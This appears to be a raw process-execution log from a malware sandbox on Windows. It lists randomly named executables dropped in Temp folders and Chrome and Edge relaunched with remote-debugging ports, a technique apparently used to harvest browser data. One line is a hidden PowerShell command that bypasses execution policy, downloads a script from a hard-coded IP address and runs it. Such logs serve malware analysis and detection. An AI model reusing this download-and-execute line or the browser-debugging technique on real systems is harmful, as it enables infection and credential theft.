"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2472 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16418882361822280437,16708039835504844017,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3712 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5688 -ip 5688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 828

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff1fbbcc40,0x7fff1fbbcc4c,0x7fff1fbbcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2024,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1700,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2060 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1772 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4528,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4844 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5040,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4920 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5180,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5344 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5456,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5468 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5028 -ip 5028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 792

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5332,i,18137460371439587555,4337107088208360020,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff247a46f8,0x7fff247a4708,0x7fff247a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2920 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2464 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,5996414859243474233,654003301175856062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4892 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\39C3.tmp\39C4.tmp\39C5.bat C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff1d2ccc40,0x7fff1d2ccc4c,0x7fff1d2ccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2416,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2412 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2456 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1952,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2232 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4520,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4524 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4516,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4488 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,8437538668917598983,13771096592058513957,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3652 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe

"C:\Users\Admin\AppData\Local\Temp\10109700101\779cd54bf7.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff1d2ccc40,0x7fff1d2ccc4c,0x7fff1d2ccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff1d2ccc40,0x7fff1d2ccc4c,0x7fff1d2ccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2300,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2296 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1696,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2336 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2032,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2452 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3156 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4424,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4500 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

